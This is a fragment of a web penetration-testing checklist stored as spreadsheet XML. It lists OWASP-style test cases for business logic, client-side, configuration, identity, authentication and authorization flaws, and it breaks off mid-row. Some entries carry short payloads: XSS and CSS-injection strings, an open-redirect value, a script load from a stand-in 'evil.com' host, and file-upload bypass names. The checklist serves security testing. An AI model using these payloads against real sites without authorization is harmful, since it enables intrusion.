  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-003</t>
  </si>
  <si>
    <t xml:space="preserve">•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-004</t>
  </si>
  <si>
    <t>Test for Process Timing</t>
  </si>
  <si>
    <t>• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-005</t>
  </si>
  <si>
    <t>Test Number of Times a Function Can be Used Limits</t>
  </si>
  <si>
    <t>• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-006</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-007</t>
  </si>
  <si>
    <t>Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-008</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t>• Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system.
• Try to upload these “unsupported” files an verify that it are properly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. 
PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-009</t>
  </si>
  <si>
    <t>Test Upload of Malicious Files</t>
  </si>
  <si>
    <t xml:space="preserve">• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. </t>
  </si>
  <si>
    <t>Client Side Testing</t>
  </si>
  <si>
    <t>OTG-CLIENT-001</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t>OTG-CLIENT-002</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>OTG-CLIENT-003</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>OTG-CLIENT-004</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>OTG-CLIENT-005</t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>OTG-CLIENT-006</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>OTG-CLIENT-007</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>OTG-CLIENT-008</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>OTG-CLIENT-009</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t>OTG-CLIENT-010</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>Burp Proxy, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>OTG-CLIENT-011</t>
  </si>
  <si>
    <t>Test Web Messaging</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>OTG-CLIENT-012</t>
  </si>
  <si>
    <t>Test Local Storage</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Pass</t>
  </si>
  <si>
    <t>Issues</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Phase 1: Information Gathering</t>
  </si>
  <si>
    <t>FILE-001</t>
  </si>
  <si>
    <t>Old, Backup, &amp; Unreferenced Files</t>
  </si>
  <si>
    <t>To discover and analyze potentially sensitive files left on the web server that are not linked from the application.</t>
  </si>
  <si>
    <t>ffuf, Burp Suite, Dirb</t>
  </si>
  <si>
    <t>1. Use a crawler to map all application-linked content. 
2. Use a file discovery tool with a comprehensive wordlist to brute-force common backup filenames (e.g., config.old, .env). 
3. Analyze discovered files for sensitive data.</t>
  </si>
  <si>
    <t>Pass: No sensitive or unreferenced files are discovered. 
Fail: Any file containing credentials, source code, configuration details, or other sensitive data is publicly accessible.</t>
  </si>
  <si>
    <t>HTTP-001</t>
  </si>
  <si>
    <t>HTTP Method Testing</t>
  </si>
  <si>
    <t>To verify that only allowed HTTP methods are enabled and that potentially dangerous methods (e.g., PUT, DELETE, TRACE) are disabled.</t>
  </si>
  <si>
    <t>cURL, Burp Suite, nmap</t>
  </si>
  <si>
    <t>1. Send an OPTIONS request to target URLs to identify supported methods. 
2. Send requests using unsafe methods like PUT, DELETE, CONNECT, and TRACE. 
3. Attempt to upload/modify content if unsafe methods appear enabled.</t>
  </si>
  <si>
    <t>Pass: The server only allows necessary methods (e.g., GET, POST) and rejects all others. TRACE is disabled. 
Fail: The server allows unsafe methods on production assets, or the TRACE method is enabled.</t>
  </si>
  <si>
    <t>DNS-001</t>
  </si>
  <si>
    <t>Subdomain Takeover</t>
  </si>
  <si>
    <t>To identify if any subdomains point to a third-party service (e.g., S3, GitHub Pages) that is no longer in use, allowing an attacker to claim it.</t>
  </si>
  <si>
    <t>subzy, Sublist3r, Amass</t>
  </si>
  <si>
    <t>1. Enumerate all subdomains for the target domain. 
2. Resolve the CNAME or A record for each subdomain. 
3. Check if the DNS record points to a de-provisioned cloud service that can be claimed by an attacker.</t>
  </si>
  <si>
    <t>Pass: All subdomain DNS records point to active and correctly configured services. 
Fail: A subdomain's CNAME points to a service that can be registered and controlled by an attacker.</t>
  </si>
  <si>
    <t>HTTP-002</t>
  </si>
  <si>
    <t>HSTS Header Configuration</t>
  </si>
  <si>
    <t>To ensure the application correctly implements the Strict-Transport-Security header to enforce HTTPS connections.</t>
  </si>
  <si>
    <t>cURL, Browser Dev Tools, SSL Labs</t>
  </si>
  <si>
    <t>1. Send an HTTPS request and inspect the response headers for Strict-Transport-Security. 
2. Check the max-age directive for a long duration (e.g., &gt;= 31536000). 
3. Verify the includeSubDomains directive is present.</t>
  </si>
  <si>
    <t>Pass: The HSTS header is present on all HTTPS responses with a strong max-age and includes subdomains. 
Fail: The HSTS header is missing, has a short max-age, or lacks the includeSubDomains directive.</t>
  </si>
  <si>
    <t>FILE-002</t>
  </si>
  <si>
    <t>File Extension Handling</t>
  </si>
  <si>
    <t>To test if the application can be forced to execute files with dangerous extensions by bypassing upload filters.</t>
  </si>
  <si>
    <t>1. Identify any file upload functionality. 
2. Attempt to upload files with malicious extensions (e.g., .php, .jsp). 
3. If blocked, try bypasses like double extensions (.php.jpg) or null characters (.php%00.jpg). 
4. Access the uploaded file to confirm execution.</t>
  </si>
  <si>
    <t>Pass: The application strictly validates file types and rejects any executable or non-whitelisted extensions. 
Fail: An attacker can upload and execute a file with a dangerous extension on the server.</t>
  </si>
  <si>
    <t>PERM-001</t>
  </si>
  <si>
    <t>File and Directory Permissions</t>
  </si>
  <si>
    <t>To verify that sensitive files and directories (e.g., .git, .svn, web.config) are not publicly accessible.</t>
  </si>
  <si>
    <t>Nikto, gobuster, Manual Browsing</t>
  </si>
  <si>
    <t>1. Attempt to directly browse to known sensitive files/directories. 
2. Use scanners to automatically check for common exposed configuration files and version control directories. 
3. Check permissions of uploaded files if possible.</t>
  </si>
  <si>
    <t>Pass: All sensitive server files and directories return a 403 Forbidden or 404 Not Found error. 
Fail: Sensitive files or directories are accessible, revealing configuration details, source code, or credentials.</t>
  </si>
  <si>
    <t>INFR-001</t>
  </si>
  <si>
    <t>Infrastructure Configuration Management</t>
  </si>
  <si>
    <t>To identify misconfigurations in the underlying infrastructure (e.g., exposed admin panels, default credentials, verbose errors).</t>
  </si>
  <si>
    <t>Shodan, Nmap, Nikto</t>
  </si>
  <si>
    <t>1. Scan the target IP range for open ports and services. 
2. Probe services for version numbers to check for known vulnerabilities. 
3. Search for default admin interfaces and test default credentials. 
4. Trigger errors to check for verbose information leakage.</t>
  </si>
  <si>
    <t>Pass: Infrastructure exposes only necessary services, uses strong credentials, runs updated software, and does not leak verbose error details. 
Fail: Unnecessary ports are open, default credentials are used, or errors reveal internal paths and versions.</t>
  </si>
  <si>
    <t>CONF-001</t>
  </si>
  <si>
    <t>Application Platform Configuration</t>
  </si>
  <si>
    <t>To ensure the application framework and server software (e.g., Apache, Nginx, Tomcat) are securely configured according to best practices.</t>
  </si>
  <si>
    <t>Nikto, Wappalyzer</t>
  </si>
  <si>
    <t>1. Identify the web server, application framework, and language used. 
2. Consult security hardening guides for the identified technologies. 
3. Check for common misconfigurations like directory listing, example files, and default accounts.</t>
  </si>
  <si>
    <t>Pass: The platform follows security best practices, with non-essential features disabled and configurations hardened. 
Fail: The platform uses default settings, includes example pages, or has known configuration weaknesses.</t>
  </si>
  <si>
    <t>HTTP-003</t>
  </si>
  <si>
    <t>HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>To determine if the application is vulnerable to HTTP request smuggling by exploiting inconsistencies in request processing between front-end and back-end servers.</t>
  </si>
  <si>
    <t>1. Identify if a proxy/load balancer and back-end server architecture is in use. 
2. Craft ambiguous HTTP requests using both Content-Length and Transfer-Encoding headers. 
3. Observe if the back-end server's response indicates a desynchronization.</t>
  </si>
  <si>
    <t>Pass: The server chain consistently processes requests and rejects ambiguous or malformed ones. 
Fail: The front-end and back-end servers interpret request boundaries differently, allowing request smuggling.</t>
  </si>
  <si>
    <t>CLOD-001</t>
  </si>
  <si>
    <t>Cloud Storage Misconfiguration</t>
  </si>
  <si>
    <t>To discover and access publicly exposed cloud storage (e.g., AWS S3, Azure Blobs) containing sensitive data.</t>
  </si>
  <si>
    <t>AWS CLI, S3Scanner, Azure Storage Explorer</t>
  </si>
  <si>
    <t>1. Identify cloud storage URLs from application source code or by guessing common naming conventions. 
2. Attempt to list the contents of the identified storage location. 
3. Test for public read, write, and delete permissions.</t>
  </si>
  <si>
    <t>Pass: All cloud storage intended for private use enforces strict access controls and denies public access. 
Fail: A storage bucket/container allows unauthorized public listing, reading, or writing of content.</t>
  </si>
  <si>
    <t>RIA-001</t>
  </si>
  <si>
    <t>RIA Cross-Domain Policy</t>
  </si>
  <si>
    <t>To ensure that crossdomain.xml or clientaccesspolicy.xml files are not overly permissive.</t>
  </si>
  <si>
    <t>cURL, Browser, Burp Suite</t>
  </si>
  <si>
    <t>1. Check for the existence of crossdomain.xml and clientaccesspolicy.xml at the web root. 
2. Analyze the file content for wildcard entries like &lt;allow-access-from domain="*" /&gt;. 
3. Determine if the policy allows unauthorized domains to make requests.</t>
  </si>
  <si>
    <t>Pass: The policy files do not exist or strictly whitelist only trusted domains. 
Fail: A policy file uses wildcards or allows untrusted domains, potentially enabling cross-site data theft.</t>
  </si>
  <si>
    <t>INFR-002</t>
  </si>
  <si>
    <t>Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t>To verify that network devices like firewalls and routers are securely configured and do not expose internal systems.</t>
  </si>
  <si>
    <t>Nmap, Masscan, Wireshark</t>
  </si>
  <si>
    <t>1. Perform external port scans to identify all internet-facing services. 
2. Analyze firewall rule sets to ensure a "deny by default" policy is in place. 
3. Check for weak configurations on exposed services (e.g., VPN, SSH).</t>
  </si>
  <si>
    <t>Pass: The network perimeter enforces the principle of least privilege, blocking all non-essential traffic. 
Fail: Unnecessary ports are open, internal services are exposed, or network devices have weak configurations.</t>
  </si>
  <si>
    <t>INFO-001</t>
  </si>
  <si>
    <t>Network and Infrastructure Mapping</t>
  </si>
  <si>
    <t>To gather information about the target's network topology, domains, IP ranges, and server technologies for a comprehensive attack surface analysis.</t>
  </si>
  <si>
    <t>Nmap, theHarvester, Maltego</t>
  </si>
  <si>
    <t>1. Use OSINT to discover domains, subdomains, and IP ranges. 
2. Perform port scanning and service enumeration on discovered hosts. 
3. Analyze DNS records (MX, CNAME, etc.) and WHOIS information to build an infrastructure map.</t>
  </si>
  <si>
    <t>Pass: A comprehensive map of the external infrastructure is created. (This is an information-gathering task). 
Fail: Insufficient information is gathered to proceed with further testing.</t>
  </si>
  <si>
    <t>Phase 2: Configuration and Deployment Management Testing</t>
  </si>
  <si>
    <t>IDM-001</t>
  </si>
  <si>
    <t>Weak Username Policy</t>
  </si>
  <si>
    <t>To verify that the application enforces a strong and consistent username policy during account creation.</t>
  </si>
  <si>
    <t>Burp Suite, Browser</t>
  </si>
  <si>
    <t>1. Review application documentation for stated username policies (length, characters, etc.). 
2. Attempt to register with usernames that violate the policy (e.g., too short, special characters, blank). 
3. Attempt to register with common/guessable usernames like admin or root.</t>
  </si>
  <si>
    <t>Pass: The application rejects all usernames that violate the defined security policy. 
Fail: The application accepts usernames that are too short, contain invalid characters, are blank, or are easily guessable.</t>
  </si>
  <si>
    <t>IDM-002</t>
  </si>
  <si>
    <t>Account Provisioning Process</t>
  </si>
  <si>
    <t>To ensure that the process of creating user accounts is secure and requires appropriate verification before granting access.</t>
  </si>
  <si>
    <t>Email Client, Burp Suite</t>
  </si>
  <si>
    <t>1. Register a new account and observe the workflow. 
2. Check if email or phone verification is required before the account becomes active. 
3. Attempt to bypass the verification step by directly accessing post-login application pages.</t>
  </si>
  <si>
    <t>Pass: Account provisioning requires identity verification (e.g., email link), and the account is not active until verification is complete. 
Fail: An account can be created and used without verifying the user's identity.</t>
  </si>
  <si>
    <t>IDM-003</t>
  </si>
  <si>
    <t>Account Enumeration</t>
  </si>
  <si>
    <t>To determine if the application reveals whether a given username is valid or invalid through differing server responses.</t>
  </si>
  <si>
    <t>Burp Suite Intruder, Hydra</t>
  </si>
  <si>
    <t>1. Identify functions where a username is used (login, password reset). 
2. Submit a known valid username and an invalid one. 
3. Compare the server responses (messages, status codes, timing) for any differences.</t>
  </si>
  <si>
    <t>Pass: The application provides a generic response for both valid and invalid usernames. 
Fail: The application's response differs for valid vs. invalid usernames, allowing an attacker to build a list of valid users.</t>
  </si>
  <si>
    <t>IDM-004</t>
  </si>
  <si>
    <t>User Registration Security</t>
  </si>
  <si>
    <t>To identify flaws in the registration process that could be exploited, such as parameter tampering or lack of rate limiting.</t>
  </si>
  <si>
    <t>1. Capture the registration request and analyze all parameters. 
2. Attempt to manipulate parameters to gain elevated privileges (e.g., by adding an isAdmin=true parameter). 
3. Test for rate limiting by submitting the registration form multiple times in a short period.</t>
  </si>
  <si>
    <t>Pass: The registration process validates all input, ignores unexpected parameters, and is protected by rate limiting. 
Fail: The registration process allows privilege escalation via parameter tampering or can be abused by bots.</t>
  </si>
  <si>
    <t>IDM-005</t>
  </si>
  <si>
    <t>Role &amp; Privilege Definitions</t>
  </si>
  <si>
    <t>To ensure that roles and privileges are clearly defined and that there is a proper segregation of duties.</t>
  </si>
  <si>
    <t>Burp Suite, Access Matrix (Manual)</t>
  </si>
  <si>
    <t>1. Obtain accounts for each defined role (e.g., admin, user). 
2. As a low-privileged user, attempt to access functions and API endpoints intended for high-privileged users. 
3. Document all access control failures.</t>
  </si>
  <si>
    <t>Pass: Users are strictly restricted to the functionality defined by their role, and all attempts to access unauthorized resources are denied. 
Fail: A user can access or perform actions outside their assigned role's scope.</t>
  </si>
  <si>
    <t>IDM-006</t>
  </si>
  <si>
    <t>Account Termination Process</t>
  </si>
  <si>
    <t>To verify that terminating an account effectively and immediately revokes all access and invalidates associated sessions.</t>
  </si>
  <si>
    <t>Browser, Burp Suite</t>
  </si>
  <si>
    <t>1. Log in with a user account and save its session cookie. 
2. Use a separate admin account to terminate the test user's account. 
3. Attempt to use the saved session cookie to access the application. 
4. Attempt to log in again with the terminated account's credentials.</t>
  </si>
  <si>
    <t>Pass: All active sessions are immediately invalidated upon account termination, and subsequent login attempts fail. 
Fail: A terminated account's session remains active, or the account can still be used to log in.</t>
  </si>
  <si>
    <t>IDM-007</t>
  </si>
  <si>
    <t>Password Recovery Security</t>
  </si>
  <si>
    <t>To ensure the password recovery mechanism cannot be manipulated to compromise user accounts.</t>
  </si>
  <si>
    <t>Burp Suite, Email Client</t>
  </si>
  <si>
    <t>1. Initiate a password reset and examine the reset link/token. 
2. Check for token predictability, low entropy, or leakage. 
3. Test if the reset token is invalidated immediately after use and expires after a short time. 
4. Check if the token is tied to the user account.</t>
  </si>
  <si>
    <t>Pass: Reset tokens are random, high-entropy, single-use, and expire quickly. 
Fail: Reset tokens are predictable, reusable, long-lived, or not securely bound to the user's identity.</t>
  </si>
  <si>
    <t>IDM-008</t>
  </si>
  <si>
    <t>Username Canonicalization</t>
  </si>
  <si>
    <t>To test if the application handles different representations of the same username inconsistently.</t>
  </si>
  <si>
    <t>1. Register a user (e.g., testuser@example.com). 
2. Attempt to register again or log in with variations like TestUser@example.com or test.user@example.com. 
3. Observe if the application treats these as the same account or different accounts across all functions.</t>
  </si>
  <si>
    <t>Pass: The application consistently normalizes usernames across registration, login, and password reset. 
Fail: The application allows registration of multiple accounts that normalize to the same identity, leading to bypasses.</t>
  </si>
  <si>
    <t>IDM-009</t>
  </si>
  <si>
    <t>Privilege Chaining</t>
  </si>
  <si>
    <t>To determine if a sequence of low-risk actions or a combination of roles can lead to unintended privilege escalation.</t>
  </si>
  <si>
    <t>Burp Suite, Manual Logic Testing</t>
  </si>
  <si>
    <t>1. Map out all functions available to a low-privileged user. 
2. Hypothesize scenarios where combining these functions could lead to higher privileges. 
3. Execute the chained steps to test the hypothesis (e.g., edit profile to add admin email, then perform password reset).</t>
  </si>
  <si>
    <t>Pass: The combination of multiple low-privilege functions or roles does not result in any form of privilege escalation. 
Fail: An attacker can chain multiple authorized, low-risk steps to gain unauthorized access or privileges.</t>
  </si>
  <si>
    <t>IDM-010</t>
  </si>
  <si>
    <t>Broken Account Deprovisioning</t>
  </si>
  <si>
    <t>To ensure that when a user's role is demoted, all associated privileges are fully and immediately revoked from active sessions.</t>
  </si>
  <si>
    <t>1. Log in with a high-privileged user and copy the session token. 
2. As an administrator, demote the user's role to a lower privilege level. 
3. Using the original session token, attempt to access the high-privilege functions that should now be denied.</t>
  </si>
  <si>
    <t>Pass: Any change in user roles or permissions takes effect immediately across all of that user's active sessions. 
Fail: A user can continue to use their old, higher privileges until their session expires or they log out and log back in.</t>
  </si>
  <si>
    <t>Phase 3: Identity Management Testing</t>
  </si>
  <si>
    <t>AUTH-001</t>
  </si>
  <si>
    <t>Weak Password Policy</t>
  </si>
  <si>
    <t>To verify that the application enforces a strong password policy regarding length, complexity, and history.</t>
  </si>
  <si>
    <t>1. Review the application's stated password policy. 
2. Attempt to set passwords that violate the policy (e.g., too short, no special characters, common passwords like "password123"). 
3. Attempt to reuse an old password.</t>
  </si>
  <si>
    <t>Pass: The application rejects any password that does not meet the minimum length, complexity, and history requirements. 
Fail: The application accepts weak, common, or previously used passwords.</t>
  </si>
  <si>
    <t>AUTH-002</t>
  </si>
  <si>
    <t>Weak Lockout Mechanism</t>
  </si>
  <si>
    <t>To ensure the application implements an effective account lockout mechanism after a set number of failed login attempts.</t>
  </si>
  <si>
    <t>1. Identify a valid username. 
2. Use an automated tool to send a high number of login attempts with incorrect passwords. 
3. Check if the account becomes temporarily or permanently locked after a reasonable threshold (e.g., 5-10 attempts).</t>
  </si>
  <si>
    <t>Pass: The account is locked after a small number of failed attempts. 
Fail: The application allows an unlimited number of login attempts, making it vulnerable to brute-force attacks.</t>
  </si>
  <si>
    <t>AUTH-003</t>
  </si>
  <si>
    <t>Default Credentials</t>
  </si>
  <si>
    <t>To identify if any accounts, especially administrative or service accounts, are using default or well-known credentials.</t>
  </si>
  <si>
    <t>Nikto, Common Credential Lists, Metasploit</t>
  </si>
  <si>
    <t>1. Enumerate potential default usernames (admin, root, administrator, test). 
2. Attempt to log in with these usernames using a list of common default passwords. 
3. Check for default credentials on all application components (e.g., web server admin panel, database).</t>
  </si>
  <si>
    <t>Pass: No default credentials grant access to the application or its components. 
Fail: Any default username/password combination provides a successful login.</t>
  </si>
  <si>
    <t>AUTH-004</t>
  </si>
  <si>
    <t>"Remember Me" Security</t>
  </si>
  <si>
    <t>To assess the security of the "Remember Me" functionality, specifically how persistent tokens are generated, stored, and managed.</t>
  </si>
  <si>
    <t>Browser Dev Tools, Burp Suite</t>
  </si>
  <si>
    <t>1. Log in using "Remember Me" and inspect the persistent cookie. 
2. Analyze the cookie's content for randomness and entropy. 
3. Check if the cookie is invalidated after a manual logout and after a password change.</t>
  </si>
  <si>
    <t>Pass: The persistent token is a high-entropy random string, stored securely (HttpOnly/Secure flags), and invalidated upon logout or password change. 
Fail: The token is predictable, contains sensitive info, or remains valid after logout.</t>
  </si>
  <si>
    <t>AUTH-005</t>
  </si>
  <si>
    <t>Username Enumeration</t>
  </si>
  <si>
    <t>To determine if the application discloses whether a username is valid through differing server responses during authentication.</t>
  </si>
  <si>
    <t>Burp Suite Intruder, OWASP ZAP</t>
  </si>
  <si>
    <t>1. On the login or password reset page, submit a known valid username and a known invalid one. 
2. Compare the server responses, including error messages, HTTP status codes, and response times. 
3. Any discernible difference allows for enumeration.</t>
  </si>
  <si>
    <t>Pass: The server's response is identical for both valid and invalid usernames. 
Fail: The application provides different responses (e.g., "Invalid password" vs. "User not found"), allowing an attacker to confirm valid usernames.</t>
  </si>
  <si>
    <t>AUTH-006</t>
  </si>
  <si>
    <t>Secure Password Reset</t>
  </si>
  <si>
    <t>To ensure the password reset process is secure and cannot be manipulated to compromise user accounts.</t>
  </si>
  <si>
    <t>1. Initiate a password reset for a test account. 
2. Examine the reset token for predictability and entropy. 
3. Verify the token is single-use and expires after a short period. 
4. Test if a reset can be initiated for one user and completed for another.</t>
  </si>
  <si>
    <t>Pass: The process uses high-entropy, single-use, expiring tokens that are securely tied to the user's identity. 
Fail: The reset token is predictable, reusable, long-lived, or can be used to reset an arbitrary user's password.</t>
  </si>
  <si>
    <t>AUTH-007</t>
  </si>
  <si>
    <t>Authentication over HTTP</t>
  </si>
  <si>
    <t>To verify that user credentials and session tokens are never transmitted over an unencrypted (HTTP) channel.</t>
  </si>
  <si>
    <t>1. Configure a proxy or network sniffer to monitor traffic. 
2. Log into the application and navigate through its pages. 
3. Inspect the traffic to ensure the login form submission and all subsequent requests containing session cookies are sent exclusively over HTTPS.</t>
  </si>
  <si>
    <t>Pass: All credentials and session tokens are transmitted only over encrypted HTTPS connections. 
Fail: The login form is submitted over HTTP, or session cookies are sent with the Secure flag missing, allowing them to be sent over HTTP.</t>
  </si>
  <si>
    <t>AUTH-008</t>
  </si>
  <si>
    <t>Verbose Login Error Messages</t>
  </si>
  <si>
    <t>To ensure that login error messages are generic and do not reveal unnecessary system or user information.</t>
  </si>
  <si>
    <t>1. Submit valid and invalid data in the login form. 
2. Input special characters (e.g., ', ", ;) to attempt to trigger database errors. 
3. Analyze the error messages returned to check for specific details like stack traces, database errors, or internal file paths.</t>
  </si>
  <si>
    <t>Pass: All error messages are generic (e.g., "Invalid username or password"). 
Fail: Error messages reveal specific reasons for failure (e.g., "SQL Error") or disclose internal system information.</t>
  </si>
  <si>
    <t>AUTH-009</t>
  </si>
  <si>
    <t>MFA Enforcement Bypass</t>
  </si>
  <si>
    <t>To verify that MFA is correctly enforced for sensitive actions and cannot be bypassed.</t>
  </si>
  <si>
    <t>Burp Suite, Authenticator App</t>
  </si>
  <si>
    <t>1. After submitting valid credentials, capture the next request in a proxy. 
2. Attempt to skip the MFA verification step by directly browsing to a post-authentication URL. 
3. Test if an MFA code can be reused.</t>
  </si>
  <si>
    <t>Pass: The application strictly requires a valid, one-time MFA code before granting access, and this check cannot be bypassed. 
Fail: An attacker can access application functionality after the first factor without providing a valid MFA token.</t>
  </si>
  <si>
    <t>AUTH-010</t>
  </si>
  <si>
    <t>OAuth/OpenID Misconfiguration</t>
  </si>
  <si>
    <t>To identify common misconfigurations in the OAuth 2.0 or OpenID Connect implementation.</t>
  </si>
  <si>
    <t>1. Test the redirect_uri parameter for open redirect vulnerabilities by supplying an attacker-controlled URL. 
2. Check if the state parameter is used and validated to prevent CSRF attacks. 
3. Test for Improper Scope Validation where a token with limited scope can access privileged data.</t>
  </si>
  <si>
    <t>Pass: The redirect_uri is strictly validated against a whitelist, and the state parameter is securely implemented. 
Fail: The redirect_uri is not validated, or the state parameter is missing/predictable.</t>
  </si>
  <si>
    <t>AUTH-011</t>
  </si>
  <si>
    <t>Reset Token Predictability</t>
  </si>
  <si>
    <t>To ensure that tokens generated for password resets or email confirmations are sufficiently random and cannot be predicted.</t>
  </si>
  <si>
    <t>Burp Suite Sequencer</t>
  </si>
  <si>
    <t>1. Generate a large number of password reset tokens (at least 100). 
2. Load the tokens into a statistical analysis tool. 
3. Analyze the character set and perform statistical tests for randomness and entropy.</t>
  </si>
  <si>
    <t>Pass: Tokens have high entropy and are statistically random (unpredictable). 
Fail: Tokens show a discernible pattern, have low entropy, or are based on predictable values (e.g., timestamps).</t>
  </si>
  <si>
    <t>AUTH-012</t>
  </si>
  <si>
    <t>Authentication Bypass via Logic Flaw</t>
  </si>
  <si>
    <t>To identify business logic flaws that could allow an attacker to bypass authentication checks.</t>
  </si>
  <si>
    <t>1. Attempt to force-browse to internal pages without logging in. 
2. Manipulate parameters or cookies that might control authentication state (e.g., userID=123, authenticated=true). 
3. Test multi-stage login processes for flaws where steps can be skipped.</t>
  </si>
  <si>
    <t>Pass: All privileged pages and functions are protected by a centralized, non-bypassable authentication mechanism. 
Fail: An attacker can access privileged content or functionality without successfully authenticating.</t>
  </si>
  <si>
    <t>Phase 4: Authentication Testing</t>
  </si>
  <si>
    <t>AUTHZ-001</t>
  </si>
  <si>
    <t>Bypassing Authorization Schema</t>
  </si>
  <si>
    <t>To verify that the application's authorization controls cannot be circumvented by manipulating requests or user roles.</t>
  </si>
  <si>
    <t>1. As a low-privileged user, attempt to force-browse to URLs intended for higher-privileged users (e.g., /admin/dashboard). 
2. Capture requests and modify parameters (user_role=admin) or HTTP methods (GET to POST) to access restricted functions.</t>
  </si>
  <si>
    <t>Pass: All attempts to access unauthorized functions or data are blocked with a proper error (e.g., 403 Forbidden). 
Fail: A low-privileged user can access any function or data intended for a higher-privileged user.</t>
  </si>
  <si>
    <t>AUTHZ-002</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>To determine if a user can gain permissions or access beyond what is intended for their assigned role.</t>
  </si>
  <si>
    <t>1. Authenticate as a low-privileged user. 
2. Identify functions specific to higher roles (e.g., user management). 
3. Attempt to execute these functions by replaying/modifying requests from a higher-privileged session. 
4. Look for hidden parameters (e.g., is_admin=true) that might grant higher privileges.</t>
  </si>
  <si>
    <t>Pass: The user is unable to perform any action not explicitly granted to their role. 
Fail: The user successfully performs an action or accesses data associated with a higher privilege level.</t>
  </si>
  <si>
    <t>AUTHZ-003</t>
  </si>
  <si>
    <t>Authorization-Context Directory Traversal</t>
  </si>
  <si>
    <t>To ensure authorization controls prevent users from accessing files outside their intended directory or data scope.</t>
  </si>
  <si>
    <t>Burp Suite, dotdotpwn</t>
  </si>
  <si>
    <t>1. Identify functions that access files/data using user-supplied input (e.g., ?file=report.pdf). 
